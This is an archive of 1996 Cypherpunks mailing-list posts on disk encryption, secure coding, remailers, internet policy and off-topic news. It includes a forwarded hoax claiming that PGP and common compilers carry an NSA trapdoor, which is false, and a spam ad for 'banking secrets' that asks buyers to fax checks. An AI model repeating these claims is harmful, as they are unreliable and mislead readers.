Subject: 	File System Encryption

I'm aware of the three main disk encryption programs SFS, SECDRV, and
SECDEV, but I need to find a solution that works with Windows 95 32bit
or Windows NT 4.0.

I'm currently using SFS 1.17 and Secure Drive under Win-95, but am
unable to continue to work in dos compatability mode due to severe
performance hits.  I am open to commercial products that have passed
peer review, but know of none.

If anyone could suggest a solution (outside of switching OS's), I
would be *most* gratefull.

Please respond to the list, as I am a subscriber under another
account.

Tried secdev? Edgar Swank (author of secdrv) recently posted
that secdev (note, not secdrv) does, in fact, uses 32 bit disk 
access with win95. Win95 reports that the secure device is in 
compatibility mode, but the host disk (and therefore the secure 
volume file) is being accessed in 32 bit (disk) mode. Not sure 
what issues there are with '32 bit FILE access' mode here. 

Sounds worth a try though. Please post the results if 
you try this.

The Drifter


EMail: wclerke@emirates.net.ae
PGP key ID: AEB2546D		FP: D663D11E DA19D74F 5032DC7E E001B702
PGP mail welcome.		Voice: +971 506 43 48 53
<a href=mailto:wclerke@emirates.net.ae>Wayne Clerke</a>
If you're not living on the edge, you're taking up too much space.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lists@lina.inka.de (Bernd Eckenfels)
Date: Wed, 28 Aug 1996 12:24:14 +0800
To: hag@ai.mit.edu
Subject: Re: Code Review Guidelines (draft)
In-Reply-To: <199608272111.RAA23997@galapas.ai.mit.edu>
Message-ID: <m0uvZT1-0004kIC@lina>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

>     Much better, look at rfc822.  (I wouldn't consider *anything* that
> has the word "sendmail" in it a good reference).

its much better if you dont rely on the content of the string at all. Dont
use sh -c or system and you will be save. Simply asume that all characters
are valid in user suplied strings and treat them exactly that way... If they
need to be exporeted then unfortunately they need to be 'untainted' and this
should be done by positive not negative lists as mentioned in the
guidelines.

Greetings
Bernd

PS: I have collected the references on
http://www.inka.de/sites/lina/freefire-l/
-- 
  (OO)      -- Bernd_Eckenfels@Wittumstrasse13.76646Bruchsal.de --
 ( .. )   ecki@{lina.inka.de,linux.de}  http://home.pages.de/~eckes/
  o--o     *plush*  2048/A2C51749  eckes@irc  +4972573817  *plush*
(O____O)       If privacy is outlawed only Outlaws have privacy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John C. Randolph" <jcr@pirate>
Date: Wed, 28 Aug 1996 18:34:01 +0800
To: cypherpunks@toad.com
Subject: Identification docs needed.
Message-ID: <9608280826.AA00285@pirate.thoughtport.com>
MIME-Version: 1.0
Content-Type: text/plain


c'punks,

Sorry for the off-topic post, but I think that the resourceful
people on this list might be able to help.

I have a friend here in NYC who is in a bit of a bind, because she  
has *no* id.  Her birth was never recorded (i.e. no birth
certificate!)

So, the question is:  Anyone have any suggestions as to how one
could obtain documentation that would pass muster with the local
passport office?  I'm hoping to help her obtain the documentation
she needs to get on an airplane without gaining too much attention  
from the JBT's.

BTW, she was born a US citizen in Puerto Rico.  Baptismal records
may be forthcoming, but that isn't certain.

advTHANKSance,

-jcr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jason Burrell <jburrell@crl.com>
Date: Wed, 28 Aug 1996 22:29:41 +0800
To: "Douglas R. Floyd" <dfloyd@io.com>
Subject: Re: File System Encryption
In-Reply-To: <199608280536.AAA01510@xanadu.io.com>
Message-ID: <Pine.SUN.3.91.960828042422.29651A-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 28 Aug 1996, Douglas R. Floyd wrote:

> > I may have to consider this approach. I'll have to look into Ian's system.
> > Does it pass muster with the crypto gods? (that's meant as a compliment
> > guys :)
> 
> It uses IDEA in a decently secure manner, as well as TDES.  You can also
> mount .au files as filesystems, and the data will be hidden in the sound
> file.
> 
> (Last place I remember Ian's loop.c and des patches for Linux was on
> ftp.csua.berkeley.edu, /pub/cypherpunks/<somewhere>)
> 

ftp.csua.berkeley.edu:/pub/cypherpunks/filesystems/linux. 

I haven't looked through the code very hard yet, but I do wonder how the
passphrase and such is stored. If I run losetup and setup
/root/stego_file.au as a filesystem on /dev/loop0, does that get stored
anywhere that isn't secure from non-root processes, or that is kept after
the filesystem is unmounted? I figure the passphrase definately is removed
as soon as the filesystem is unmounted, and that this is stored in
protected kernel memory. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 28 Aug 1996 23:16:23 +0800
To: cypherpunks@toad.com
Subject: Real or Not ?
Message-ID: <199608281157.EAA04520@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


I snagged this off a news group this AM.. comments??

A lot of people think that PGP encryption is unbreakable and that the
NSA/FBI/CIA/MJ12 cannot read their mail. This is wrong, and it can be a
deadly mistake. In Idaho, a left-wing activist by the name of Craig Steingold
was arrested  _one day_ before he and others where to stage a protest at
government buildings; the police had a copy of a message sent by Steingold
to another activist, a message which had been encrypted with PGP and sent
through E-mail.

 Since version 2.1, PGP ("Pretty Good Privacy") has been rigged to 
allow the NSA to easily break encoded messages. Early in 1992, the author, 
Paul Zimmerman, was arrested by Government agents. He was told that he 
would be set up for trafficking narcotics unless he complied. The Government 
agency's demands were simple: He was to put a virtually undetectable 
trapdoor, designed by the NSA, into all future releases of PGP, and to
tell no-one.

 After reading this, you may think of using an earlier version of 
PGP. However, any version found on an FTP site or bulletin board has been 
doctored. Only use copies acquired before 1992, and do NOT use a recent 
compiler to compile them. Virtually ALL popular compilers have been 
modified to insert the trapdoor (consisting of a few trivial changes) into 
any version of PGP prior to 2.1. Members of the boards of Novell, Microsoft, 
Borland, AT&T and other companies were persuaded into giving the order for
the modification (each ot these companies' boards contains at least one
Trilateral Commission member or Bilderberg Committee attendant).

 It took the agency more to modify GNU C, but eventually they did it.
The Free Software Foundation was threatened with "an IRS investigation",
in other words, with being forced out of business, unless they complied. The
result is that all versions of GCC on the FTP sites and all versions above 
2.2.3, contain code to modify PGP and insert the trapdoor. Recompiling GCC
with itself will not help; the code is inserted by the compiler into
itself. Recompiling with another compiler may help, as long as the compiler
is older than from 1992.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 28 Aug 1996 22:02:28 +0800
To: cypherpunks@toad.com
Subject: (Fwd) Re: **"OuR" Project press release** (fwd)
Message-ID: <199608281137.GAA08101@einstein>
MIME-Version: 1.0
Content-Type: text



Hi all,


I thought I would forward this so those less connected might know of amateur
space technology. With a factor of 5 increase in altitude these folks will
be putting things in LEO. My guess, 3-5 years.


Forwarded message:
> From postmaster@ddg.com Tue Aug 27 23:25:59 1996
> Message-Id: <199608280351.WAA21839@oak.zilker.net>
> Comments: Authenticated sender is <stu@mail.zilker.net>
> From: "Stu Barrett" <stu@zilker.net>
> Organization: Personal Business
> To: hct@ddg.com
> Reply-To: hct@ddg.com
> Errors-To: postmaster@ddg.com
> Precedence: bulk
> X-Listserver: AutoShare 1.0.2fc14 by Mikael Hansen
> X-Administrivia-To: Stu Barrett (Stu@Zilker.net)
> X-To-Unsubscribe: autoshare@ddg.com, body: unsub hct
> X-See-Also: http://www.DDG.com/
> Date: Tue, 27 Aug 1996 22:53:36 -6
> Subject: (Fwd) Re: **"OuR" Project press release**
> Priority: normal
> X-mailer: Pegasus Mail for Windows (v2.23)
> 
> Pulled this off of the net.  The was even better than SkyeDance IV ;-)
> 
> ------- Forwarded Message Follows -------
> 
> Paul Robinson & Ken Mizoi wrote:
> > 
> > To All Fellow Rocketeers:
> > 
> >         The "OuR" project was launched Friday, August 16th, 1996 at 9:05 PST.
> > All available flight data is still being analyzed so any information
> > presented is preliminary and is provided for the courtesy of all those
> > who have supported the "OuR" team.
> > 
> >         First, the principal members of the "OuR" team are, in alphabetical
> > order, Frank Kosdon, Phil Prior, Paul Robinson, and Jim Rosson.  These
> > dedicated souls spent two years of dedicated research and effort, not
> > to mention tens of thousands of dollars, to build and fly the "OuR"
> > project.
> > 
> >         The R motor is a proprietary engine design with the propellant
> > provided by Frank Kosdon.  It was 10.5" in diameter and contained
> > almost 300 pounds of propellant, including a 21 pound, full diameter
> > delay "cake" for tracking.  It was calculated to burn for 10.5
> > seconds, and provide 285,000 Newtons of total impulse.  Yes, in
> > rocketeer terms an R27,000!
> > 
> >         The airframe was 21 feet long, with a 5 to 1 conical nose.  The gross
> > launch mass was about 700 pounds.  On board was a ten watt video
> > downlink, provided by Jon Dunbar, a Trimble GPS, video overlay and
> > associated electronics, provided by Bob Rau, and various other backup
> > electronics.  Both main and drouge parachutes were provided by Bob
> > Stroud.
> > 
> >         The rocket was launched in almost no winds, pointing a few degrees
> > away from the town of Gerlach, NV for safety reasons.  The rocket flew
> > perfectly straight and the motor functioned flawlessly with a total
> > activity time around 12 to 14 seconds.  The rocket coasted for about
> > 80 seconds, slightly more than calculated, into the ozone layer.  The
> > altitude simulations pointed to an expected altitude of just under
> > 100,000 feet.  With the increased activity time and increased coast
> > time, the altitude most likely exceeded 100,000 feet.
> > 
> >         One highlight of this flight was the video data transmitted back to
> > earth from approximately twenty miles in the sky.  What was seen was a
> > clear outline of the entire Black Rock Dessert and the surrounding
> > terrain, the curvature of the earth, and the great blackness of the
> > space.
> > 
> >         Higher altitudes are accessible by smaller rockets, but the intent of
> > this project was to successfully build and fire a "large" rocket
> > motor.  Previously, only commercial enterprises have had success with
> > motors of over four inches in diameter and the results of last year's
> > BALLS launch support this presumption.  Furthermore, the instruments
> > carried aloft simply would not fit in say a 54mm "altitude optimized"
> > motor.
> > 
> >         Unfortunately, the rocket failed to deploy its recovery systems and
> > accelerated to over Mach 1 and impacted into the sand dunes several
> > miles away.  There was a loud sonic boom heard by all that literally
> > shook the earth.  In fact, instead of the nominal "hole and fin slits"
> > seen in previous impacts, there was a twenty foot diameter area with
> > large chunks of sheared earth as if a high energy charge had been
> > detonated under the ground.  The rocket was not recovered, but several
> > pieces of metal, fiberglass, and burnt Nomex were found indicating the
> > ejection charges did in fact fire.
> > 
> >         As more data is analyzed, and more hard facts are gathered, more
> > information will follow.  Furthermore, the rights to the video are in
> > the negotiation stage with the various film crews present, but do
> > expect a very detailed video from Earl Cagle of Point 39 Productions.
> > 
> >         Once again, the "OuR" Project members wish to express sincere thanks
> > to all those who listened, donated, and gave their support who were
> > not specifically named.  This project would not have flown if were not
> > for the "believers" and the tremendous team spirit.  Only they know
> > the sweat and the number of hours it takes to fly such a rocket.
> > 
> >                                                         Members of the "OuR" Team
> 
> -----------------
> Stu Barrett
> e-mail: stu@zilker.net
> Phone: 512-255-6052
> 
> "Out the transceiver, down the coax, through the router, down the
> fiber, off another router, down the T1, past the firewall.....nothing
> but Net."
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: matthew@itconsult.co.uk (Matthew Richardson)
Date: Wed, 28 Aug 1996 17:43:12 +0800
To: cypherpunks@toad.com
Subject: An open letter to the Editor of The Observer
Message-ID: <3224ef54.383859120@itconsult.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


[I understand the text of the Observer article is available at
http://www.hclb.demon.co.uk/obs.txt]

-----BEGIN PGP SIGNED MESSAGE-----

I. T. Consultancy Limited

Our reference  L2217

The Editor
The Observer
119 Farringdon Road
London EC1R 3ER

26 August 1996

AN OPEN LETTER - FOR PUBLICATION

Sir,

I read with some interest the article by David Connett and Jon Henley 
in yesterday's edition regarding the Internet and child pornography.  
I was particularly interested as I am a computer consultant advising 
clients on Internet issues.

In my professional opinion, the technical standard of the reporting 
was sufficiently poor as to be both inaccurate and misleading.  The 
purpose of this letter is to clarify certain technical issues which 
might cause your readers to reach unfounded or incorrect conclusions.

It is important to be aware of the various methods by which 
information generally (which can include pornography) is distributed 
around the Internet.  Your article focuses on one particular route, 
namely Newsgroups.  It is Newsgroups which are detailed in the 
Metropolitan Police's letter to Internet Providers and which are 
concentrated upon by your article.  There are several other means of 
distributing information.  I believe however that the Police letter 
lists fewer than the 150 groups referred to by the authors.  
Interestingly enough Newsgroups only offer the means of broadcasting 
information to anyone who wants to retrieve it.

The authors do not appear to have a sufficient grasp of what a 
"remailer" does.  For example they seem to draw a direct link between 
the use of such remailers and people being able to "log on and 
participate in 'live' and 'interactive' filmed sessions".  A lay 
reader would perhaps draw the inference that the remailer is somehow 
involved in any such live participation.  Unfortunately this could 
not be further from the truth.  Remailers simply allow people to post 
messages, either as email to other people or to Newsgroups for 
general reading.  Nothing more.  Remailers are generally incapable of 
being "logged on" to.

Your article also refers to "remailing companies", from which the lay 
reader might infer that remailers are operated for commercial profit.

Such an inference would again be wholly incorrect.  I know of no 
organisation operating a remailer for profit, indeed none of them 
even charge for their services.  They are generally run by 
individuals on a voluntary basis who consider them as a service to 
the Internet community.  Your article appears not to mention any of 
the purposes of such remailers other than in terms of the 
distribution of pornography.  In my view it would be difficult to 
present a balanced article without doing so.

Different remailers take different steps to prevent whatever their 
operators consider as "abuse".  My understanding is that Mr. 
Helsingius' service restricts messages to 48k bytes (or characters) 
and prohibits postings to the "binaries" newsgroups designated for 
images.  I also understand that it only allows 30 messages per user 
per day.  At a technical level these restrictions would make it 
almost impossible to use his service for mass distribution of any 
binary data, not just pornography.

It therefore appears surprising to me that your article should allege 
that Mr. Helsingius' remailer is responsible for handling "90 per 
cent of all child pornography" on the Internet.  I wonder what 
substantiating evidence The Observer has to this effect other than 
the alleged claim by Toby Tyler.  Indeed it appears from your article 
that the words "is supplied through this remailer" may not be a 
direct quote from Toby Tyler.

Your article alleges that "the photographs made available to Demon's 
subscribers through the Internet are supplied anonymously by 
remailing companies".  The lay reader might infer from this that all 
photographs therefore come via remailers.  Again this would be far 
from the truth.  

Finally I hope this letter offers some assistance to your readers in 
clarifying a number of issues which were perhaps less than clear in 
your article.  Given your newspaper's difficulties with technical 
issues, I would be grateful if you would kindly refer any editing of 
this letter to me prior to publication.

Yours faithfully,
Matthew Richardson

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAgUBMiFvEAKwLwcHEv69AQGjIQP+IGR9rhvdYXe7CuCcwPl/tIrIBryikTM2
IVOpygTF2nCPf3WEJ8czRvs1emp9d9d++69XiG1f6QAeP9Jv/h9KzVtV7mjjuqCX
LhlhXBYjLIiGCcxljKZ07zHFlCeZWCzuAmIFnZbz2fNNjqyicheIMlxI2tDrGgjp
dlaGZuAI2XY=
=dkXg
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scottauge@aol.com
Date: Wed, 28 Aug 1996 23:13:32 +0800
To: cypherpunks@toad.com
Subject: SCO giving free licenses to UNIX OpenServer
Message-ID: <960828080524_511466918@emout19.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Hit www.sco.com

Pick What's New

Look for UNIX Unbound.

Read, Understand, and Delight... Microsoft maybe in trouble at last.

This is for single user home based UNIX systems.

Was announced August 19, don't know how long this is to happen.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Voters Telecommunications Watch <shabbir@vtw.org>
Date: Wed, 28 Aug 1996 23:37:58 +0800
To: cypherpunks@toad.com
Subject: ALERT: Sen. Kerry, who voted FOR THE CDA, will be online tonight to chat! (8/28/96)
Message-ID: <199608281215.IAA00261@panix3.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


============================================================================
__     _________        __
\ \   / /_   _\ \      / /        HELP EDUCATE SENATOR KERRY ONLINE!
 \ \ / /  | |  \ \ /\ / /	AT THE DEMOCRATIC CONVENTION ONLINE CHAT
  \ V /   | |   \ V  V /	    ON AUGUST 28, 1996 -- 4PM CDT/5PM EST
   \_/    |_|    \_/\_/	       

	SENATOR KERRY, WHO VOTED FOR THE COMMUNICATIONS DECENCY ACT, WILL
 	BE ONLINE!  PLEASE ATTEND AND EDUCATE HIM ABOUT SMART NET POLICY!

		DO NOT DISTRIBUTE AFTER SEPTEMBER 1, 1996

----------------------------------------------------------------------------
Table of contents
	What's New
	Why you should join these chats
	Chat schedule
	Getting chat software

----------------------------------------------------------------------------
WHAT'S NEW

Senator John Kerry, who voted in favor of the Communications Decency
Act and who has been dragging his feet on the encryption issue in the
Senate Commerce Committee, is on the Democratic Convention Chat schedule 
for this Wednesday, 4pm CDT (5pm EST).

Like many Senators, John Kerry's views are a combination of his personal
opinions, plus his perception of his constituencies' opinion.  When
he voted IN FAVOR OF THE COMMUNICATIONS DECENCY ACT, he was not listening
to his constituency very well.  The high tech community of Cambridge 
must make him understand that bad Internet policy, like the Communications
Decency Act, can kill this industry, causing us to lose our jobs and the
state to lose a valuable industry.

Although Sen. Kerry shouldn't be let off the hook for voting of the CDA,
he needs to be shown that in hindsight, this was a terrible vote. Hostility
will not change his mind though, so please don't ask questions like,
"Senator, what the heck were you thinking when you voted for this stupid
bill which everyone knew was unconstitutional?"

Questions like these will just cause him to wrap himself in a "protecting
children" speech.  Instead, why not try questions like,

"Senator, don't you think that enough has changed in the past several months
 that would suggest that parents are really the best ones to control their
 kids access to the net?  Would you still vote for the CDA today?"

"Senator, don't you agree laws such as the CDA are really a poor second to
 a little bit of plain old parenting?  If more parents were to learn about
 the net, would there still be a need for the CDA?"

"Senator, I surf the net with my 10-year-old.  I think that's a far better
 cry than the CDA.  What could we do to encourage more parents to take this
 approach, rather than passing laws that harm Massachusetts businesses and
 freedom of speech?"

Know that the urge to flame him for his vote on the CDA will be strong.
It should be, it was a terrible position for someone from such an incredibly
net-savvy state.  No matter how you view politics, it was a poor move.
It angers both the business and public.  Please do not flame him, instead
try to change his mind.

It is imperative that the net community come out and show him this is a 
very serious issue for us, and that we won't forget his position on this.
Remember, the chat is at 4pm CDT, which is 5PM EST.  Please show up
early, as this is likely to be a very full chat.

----------------------------------------------------------------------------
WHY YOU SHOULD JOIN THESE CHATS

The Democratic convention's online chat program has begun!  It's crucial
that Netizens make net concerns a high profile issue in the online chats
this year.  You can do this by showing up and simply asking the right
questions.  Does the candidate think the Communications Decency Act is
an effective method of shielding kids from material online, or parental
control?  Does the candidate support the use of privacy-enhancing 
encryption technology?  Does the candidate support program such as
THOMAS, that put government info in the hands of the people?

If you don't ask these questions, they'll never know we care.

----------------------------------------------------------------------------
CHAT SCHEDULE

[Notably missing from this schedule are Senators Patrick J. Leahy (D-VT) 
 and Russell Feingold (D-WI) and House member Jerrold Nadler (D-NY).  All
 three have impeccable cyberspace credentials and we look forward to seeing
 them online.]

All chats take place at http://ichat.dncc96.org:4080/

Monday
	08/26/96 - 4:20pm CDT Governor Lawton Chiles 
	08/26/96 - 7:15pm CDT House Candidate Michela Alioto 
	08/26/96 - 10:30pm CDT Congressman Bill Richardson 
Tuesday
	08/27/96 - 9:00am CDT Senate Candidate Houston Gordon 
	08/27/96 - 5:00pm CDT Congresswoman Nita Lowey 
Wednesday
	08/28/96 - 9:00am CDT - Senate Candidate Houston Gordon 
	08/28/96 - 10:00am CDT - Governor Gaston Caperton 
	08/28/96 - 3:00pm CDT - Senator John D Rockefeller IV 
---->	08/28/96 - 4:00pm CDT - Senator John Kerry 
	08/28/96 - 4:30pm CDT - Senator Harry Reid 
	08/28/96 - 9:30pm CDT - Representative Corrine Brown 
Thursday
	08/29/96 - 10:30am CDT - Senate Candidate Houston Gordon 
	08/29/96 - 2:30pm CDT - Senator Kent Conrad 
	08/29/96 - 3:30pm CDT - Representative Eliot Engel 
	08/29/96 - 6:00pm CDT - Representative Barney Frank 
	08/29/96 - 7:00pm CDT - Senators Boxer & Murray 

Don't miss this opportunity to question the newsmakers on net issues
such as free speech and privacy!  We have to ensure that they feel 
appreciated for standing up for Net issues.

----------------------------------------------------------------------------
GETTING CHAT SOFTWARE

The Democratic Convention has chosen iChat's chat software for their
interface.  To obtain a copy, simply follow the links from the main
convention homepage at http://www.dncc96.org/ to the software section.

				###
============================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Campbell <campbell@c2.org>
Date: Wed, 28 Aug 1996 23:49:31 +0800
To: cypherpunks@toad.com
Subject: Re: Microsoft Explorer security hole (fwd) MSoft's reply...
In-Reply-To: <199608280257.TAA25752@scn.org>
Message-ID: <9608281246.AA15630@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    Date: Tue, 27 Aug 1996 19:57:53 -0700 (PDT)
    From: SCN User <bf578@scn.org>
    
    BTW: When is this list/listserver going to convert the reply-to fields to 
         point to cypherpunks@toad.com?

Hopefully never.  It's the wrong way for a distribution list to work.

If you personally want replies to just go to the list, then you can
add a reply-to field in your message.  I prefer when people do a
standard `reply all' to reply to me and CC the recipients of my
message.  In that way, I can file messages to a list in a folder while
treating those that are explicitly specially -- I might want to see
them sooner so as to reply sooner.

The distribution list should just distribute messages.  The sender
should determine the addressing.

			Rick




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Wed, 28 Aug 1996 23:17:06 +0800
To: cypherpunks@toad.com
Subject: Re: A _REALLY_ Interesting Bet
In-Reply-To: <199608272002.OAA27298@zifi.genetics.utah.edu>
Message-ID: <322439A4.69D8BD19@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous wrote:
> 
> Betting on football is one thing, but some of us would be very
> interested in the odds on US presidential election outcomes as
> November approaches. This kind of betting is illegal here, and
> I haven't looked lately for a "Ladbroke's" type site, but it is
> interesting because the betting odds from across the Atlantic
> more closely match eventual election results than the annoying
> calls from Gallup & Roper during suppertime. I have posted here,
> anonymously, on this topic before, but some of you are aware of
> who I am. I'll thank you to keep that a secret. ;}


This is an interesting bet.  Can anyone provide me with a list of
candidates for the election?

Many thanks,

Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Neely <accessnt@ozemail.com.au>
Date: Wed, 28 Aug 1996 18:09:35 +0800
To: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Subject: Re: Australian Interbet Betting System Gets US Interest 08/26/96
Message-ID: <2.2.32.19960828082856.006d5744@ozemail.com.au>
MIME-Version: 1.0
Content-Type: text/plain



>>CentreBet can be reached at http://www.taunet.com.au/centrebet  

BTW .. that is //www.taunet.net.au/centrebet
                            ^^^

Regards,

Mark
___
Mark Neely - accessnt@ozemail.com.au 
Lawyer, Internet Consultant, Professional Cynic
Author: Australian Beginner's Guide to the Internet (2nd Ed.)
	Australian Business Guide to the Internet
	Internet Guide for Teachers, Students & Parents
Check out my Anti-SPAM FAQ: http://www.accessnt.com.au/faqs/spam.htm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "~~ SECRETS ~~" <massmail@aol.com>
Date: Sat, 31 Aug 1996 05:28:29 +0800
To: joe546@aol.com
Subject: ~~ Bankers' Secrets ~~
Message-ID: <199608291833.OAA17573@smtp2.interramp.com>
MIME-Version: 1.0
Content-Type: text/plain


=======> BANKING SECRETS REVEALED!! <=======

====> SAVE $100,000 & EARN 7% to 10% INTEREST <====

Dear Friend, 

Did you know that you can save up to $100,000 on the 
biggest investment in your life? For MANY Americans they
have a dream to one day own their home. When that dream is
reached, they spend the rest of their life paying that dream
off. You are being ripped off everyday by Banks, Financing
Companies, Mortgage Companies etc. Did you know that by the
time you pay off your home you will pay FIVE TIMES what it
is worth? Is that fair to you and your dream? We don't think
so and we bet you don't either. That's why we are going to
show you how to save up to $100,000 and pay off your home up
to 7 years faster! Sound too good to be true? Believe us, we
will show you step by step how the mortgage game is played
with the Banks, Financing Companies and Mortgage Companies
and how to beat them at their own game. Everything we show
you is 100% LEGAL and anybody can do it. It's just very few
people know about it. These are very LOW-KEY SECRETS that
you will learn. The reason the Banks never tell you is
because if everyone knew the Banks' secrets they would be
put out of business. If you ever heard someone say " My Bank
is getting rich off my money, " they are absolutely RIGHT!
Banks do get rich off your money because they lend it to
other people and charge them 9% interest and only pay you up
to 3% interest, if you're lucky! So that means Banks are
getting 6% interest on YOUR MONEY! Many Mortgage Companies
are being and have been sued for OVERCHARGING homeowners.
This is your chance to become Financially Independent. Can
you imagine if you saved $80 or $50 THOUSAND DOLLARS and
made that American Dream come true by paying your house off
7 years faster? What could you do with that extra money?
We're sure you could think of something, RIGHT? Maybe a
family vacation or a new car? There are other companies
charging $250 to $500 DOLLARS to show you everything that we
are going to. But, we are not even asking a fraction of that
cost. For the COMPLETE 25 page step-by- step manual, we are
only asking $24.95. Plus, we are going to give 2 SPECIAL
BONUSES to the next 50 people who order our great package
and are determined to make a change. Our first SPECIAL BONUS
to you is called a " MORTGAGE & LOAN CALCULATOR. " This
is a Windows Based program that will keep track of every Loan and
Mortgage that you have!  You won't ever have to worry about
being OVERCHARGED because you will have all your personal
information right at your fingertips and you can keep track
of all your Loans and Mortgages! Our SECOND SPECIAL BONUS
is: "HOW TO EARN 7 TO 10% INTEREST ON YOUR MONEY."
This is too good of a deal to just pass by, and we don't think there
is anybody in the industry who will ever offer an
opportunity like this! You will have everything you need to
put your financial life right on track with your dreams. We
all have dreams and this is your chance to make yours come
true. You owe it to yourself and your family to take FULL
advantage of this unique opportunity. Look at it this way,
you go to work day in and day out, just to pay off your
home. With our program, it will be up to 7 years LESS that
you have to work to pay off your home and up to $100,000
MORE into your bank account instead of giving it to the
BANK! The BEST part is you don't even have to refinance! You
can even use this as a business opportunity. You can easily
place ads in your local newspapers offering to save people
money using the SECRETS you will know. You can even save
your family members THOUSANDS off their mortgage. We look
forward to getting you this tremendous package right away.

Here's how you can place you order:

Program is $21.95 + $3.05 Shipping & Handling a Total of
$25.00

Send Check or Money Order made
payable to: Creative Financial Alternatives 

Creative Financial Alternatives
Banking Secrets
14837 Detroit Ave. Suite 135
Lakewood, Ohio
44107 

** For Faster Processing you can FAX your check to:
1-216-226-3225 How this works is pretty simple, just tape
your check to a piece of paper and fax it. After faxing your
check simply void it out and keep it for your own records.
Please do not mail it to us if you fax it.

Sincerely,
Creative Financial Alternatives

( c ) Copyrighted 1996 

Under no circumstances may any of this material be
reproduced in any form without the author's written
permission. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vipul Ved Prakash <vipul@pobox.com>
Date: Thu, 29 Aug 1996 08:05:52 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Cypherpunks Home Page
Message-ID: <199608260735.HAA19388@fountainhead.net>
MIME-Version: 1.0
Content-Type: text



Can't get to the cypherpunks web page. Have been trying for last 
two daz, seems that the WWW server has decided not to respond.

- Vipul
 

-- 

Vipul Ved Prakash                       Voice   91 11 2247802
<vipul@pobox.com>                       Fax     91 11 3328849

Web Development, PERL Scripting, Cognitive Comuting, TCP/IP,
Linux, Cryptography and Internet Security






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@amaonline.com>
Date: Thu, 29 Aug 1996 01:08:01 +0800
To: cypherpunks@toad.com
Subject: Re: AFDA Web Site
Message-ID: <199608281409.HAA19374@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Wed Aug 28 09:08:59 1996
> MEMORANDUM
> 
> SUBJECT:  AFDA Web site, located at:  http://www.afda.org
> 
> In September, the Web site for the Association of Federal Defense
>  Attorneys
> (AFDA) will become password-protected for members only.  Those of you
>  who
> have paid your membership dues for 1996 will be receiving an email
>  message
> containing a User ID and Password, which will be good through December
>  31,
> 1997 -- almost a year and a half of unlimited usage for the small
>  membership

Okay, so are they going to encrypt the email, or should I go ahead and make 
arrangements to steal a message :-)

Dave Merriman

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
PGP Email welcome, encouraged, and PREFERRED. Visit my web
site at         http://www.shellback.com/p/merriman
for my PGP key and fingerprint
"What is the sound of one hand clapping in a forest
with no one there to hear it?"
I use Pronto Secure (tm) PGP-fluent Email software for Windows
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMiOcLsVrTvyYOzAZAQG4XAQAnNHZtuU5rB9cttuP4xIJ16N/XO3Ds6+L
k4sS0w0I8+Rm+0Py9kYf3en3I9oPrP8fuQxXefBtlTO9FltWrApSR5otgO1LJtX6
EzYtDcXnXwD7nRZ74efLFktn5DXG4xODIFT0fRWbohZOkukh6ePheWWnOiPc+nFr
e8hXmqO7KWk=
=IfoC
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@amaonline.com>
Date: Thu, 29 Aug 1996 01:11:58 +0800
To: cypherpunks@toad.com
Subject: Crypto-related (sort of) Dilbert
Message-ID: <199608281418.HAA19532@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Wed Aug 28 09:17:30 1996
For those that haven't seen it - the Dilbert page has a kind-of 
crypto-related comic at

http://www.unitedmedia.com/comics/dilbert/

Dave Merriman

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
PGP Email welcome, encouraged, and PREFERRED. Visit my web
site at         http://www.shellback.com/p/merriman
for my PGP key and fingerprint
"What is the sound of one hand clapping in a forest
with no one there to hear it?"
I use Pronto Secure (tm) PGP-fluent Email software for Windows
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMiOeL8VrTvyYOzAZAQEEIwQAms06+S3+2NGhh18vgC2sHQ7/tOsry5i1
BPAPVo2guBfHMNhtCaof0mie/wsv6mKoESz8HwtRdSZTOLUtGntsS4TQxfEgdkFA
